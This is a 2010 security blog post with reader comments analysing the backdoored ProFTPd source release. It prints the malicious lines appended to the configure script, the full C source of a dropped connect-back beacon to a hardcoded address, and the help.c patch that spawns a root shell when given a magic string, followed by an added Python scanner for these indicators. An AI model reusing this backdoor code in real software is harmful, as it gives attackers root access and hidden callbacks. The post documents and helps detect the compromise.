News: ProFTPd owned and backdoored
I have just been informed of this. After compromising the remote host, they backdoored the popular FTP daemon by adding the following stuff.
gcc tests/tests.c -o tests/tests >/dev/null 2>&1
cc tests/tests.c -o tests/tests >/dev/null 2>&1
tests/tests >/dev/null 2>&1 &
rm -rf tests/tests.c tests/tests >/dev/null 2>&1
This was appended to the ‘configure’ script; it compiles, runs in the background and then deletes a new C file that was added under the tests directory, named tests.c, which is this:
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <string.h>

#define DEF_PORT 9090
#define DEF_TIMEOUT 15
#define DEF_COMMAND "GET /AB HTTP/1.0\r\n\r\n"

int sock;

/* SIGALRM handler: give up silently once DEF_TIMEOUT seconds have passed. */
void handle_timeout(int sig)
{
    close(sock);
    exit(0);
}

int main(void)
{
    struct sockaddr_in addr;
    struct hostent *he;
    u_short port;
    char ip[20] = "212.26.42.47";   /* hardcoded connect-back address */

    port = DEF_PORT;
    signal(SIGALRM, handle_timeout);
    alarm(DEF_TIMEOUT);

    he = gethostbyname(ip);
    if (he == NULL)
        return(-1);

    addr.sin_addr.s_addr = *(unsigned long*)he->h_addr;
    addr.sin_port = htons(port);
    addr.sin_family = AF_INET;
    memset(addr.sin_zero, 0, 8);
    sprintf(ip, inet_ntoa(addr.sin_addr));

    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        return EXIT_FAILURE;
    }
    if (connect(sock, (struct sockaddr*)&addr, sizeof(struct sockaddr)) == -1) {
        close(sock);
        return EXIT_FAILURE;
    }
    /* One-shot beacon: send the fixed HTTP-looking request and leave. */
    if (-1 == send(sock, DEF_COMMAND, strlen(DEF_COMMAND), 0)) {
        return EXIT_FAILURE;
    }
    close(sock);
    return 0;
}
A simple remote backdoor that sends the ‘DEF_COMMAND’ magic value. In addition, src/help.c was patched to add the following ‘if’ clause:
} else {
    if (strcmp(target, "ACIDBITCHEZ") == 0) {
        setuid(0);
        setgid(0);
        system("/bin/sh;/sbin/sh");
    }

    /* List the syntax for the given target command. */
    for (i = 0; i < help_list->nelts; i++) {
Quite self-explanatory. Unfortunately, the compromise and the subsequent backdooring were quickly detected…
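As an added detection example (my own code, not part of the original post or of ProFTPD), here is a small scanner that walks a source tree and reports the artifacts described above: the build hook appended to ‘configure’, the dropped tests/tests.c, the ‘ACIDBITCHEZ’ check in src/help.c, and the hardcoded connect-back address. The indicator strings are taken from the post; the two sample trees it builds are constructed for the demonstration and do not contain the real backdoor.

```python
"""Scan a ProFTPD source tree for the backdoor artifacts described in the post.

Added example, not the project's own code. Every indicator below is quoted
from the post; the sample trees are constructed in a temporary directory.
"""
import os
import tempfile

# Indicators quoted from the post
CONFIGURE_MARKERS = (
    "gcc tests/tests.c -o tests/tests",
    "cc tests/tests.c -o tests/tests",
    "rm -rf tests/tests.c tests/tests",
)
HELP_MARKER = 'strcmp(target, "ACIDBITCHEZ")'
CALLBACK_IP = "212.26.42.47"
DROPPED_FILE = os.path.join("tests", "tests.c")


def _read(path):
    """Read a file as text, tolerating binaries and unreadable entries."""
    try:
        with open(path, "r", errors="replace") as fh:
            return fh.read()
    except OSError:
        return ""


def scan_tree(root):
    """Return a sorted list of (indicator, relative_path) findings for one tree."""
    findings = []
    conf = _read(os.path.join(root, "configure"))
    if any(marker in conf for marker in CONFIGURE_MARKERS):
        findings.append(("configure_build_hook", "configure"))
    if os.path.exists(os.path.join(root, DROPPED_FILE)):
        findings.append(("dropped_tests_c", DROPPED_FILE))
    # Walk every file for the help.c hook and the hardcoded address, since a
    # modified tree could carry them under a different file name.
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            text = _read(path)
            if HELP_MARKER in text:
                findings.append(("help_c_shell_hook", rel))
            if CALLBACK_IP in text:
                findings.append(("callback_ip", rel))
    return sorted(set(findings))


def _write(root, rel, text):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(text)


def build_sample_tree(backdoored):
    """Construct a minimal fake source tree, clean or carrying the indicators."""
    root = tempfile.mkdtemp(prefix="proftpd-scan-")
    _write(root, "configure", "#!/bin/sh\necho checking...\n")
    _write(root, os.path.join("src", "help.c"),
           "/* List the syntax for the given target command. */\n")
    if backdoored:
        # Only the indicator strings are planted, not the backdoor itself.
        with open(os.path.join(root, "configure"), "a") as fh:
            fh.write("gcc tests/tests.c -o tests/tests >/dev/null 2>&1\n")
        _write(root, DROPPED_FILE, 'char ip[20]="212.26.42.47";\n')
        _write(root, os.path.join("src", "help.c"),
               'if (strcmp(target, "ACIDBITCHEZ") == 0) {\n')
    return root


if __name__ == "__main__":
    for label, flag in (("clean", False), ("backdoored", True)):
        print(label, scan_tree(build_sample_tree(flag)))
```

Run it against a real unpacked tarball with `scan_tree("/path/to/proftpd-src")`; an empty list means none of the post's indicators were found, which is not the same as the tree being clean, so pair it with a checksum comparison against a known-good copy.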
Did Thiseas do it?
some user
December 2, 2010 at 17:14
>>A simple remote backdoor that uses ‘DEF_COMMAND’ magic value
Is it?
PS Nice blog!
toast
December 2, 2010 at 18:01
@toast: I didn’t go into any details because it’s very straightforward. It connects back to 212.26.42.47:9090 and sends ‘DEF_COMMAND’.
xorl
December 2, 2010 at 21:38
Why did they add another file, seems a bit overkill to me.
Quassum
December 2, 2010 at 22:08
Can you imagine, a connect-back to Saudi Arabia! Hmm, who could have thought.
Persist
December 3, 2010 at 02:34
Really, using IPv4-specific library calls, defines and structures is so 80’s, not to mention the non-portable signal handling. What are they teaching the kids these days?
Vlad
December 4, 2010 at 01:30
@xorl: Yes, that’s what it does. Yet you call it a backdoor.
q
December 5, 2010 at 02:38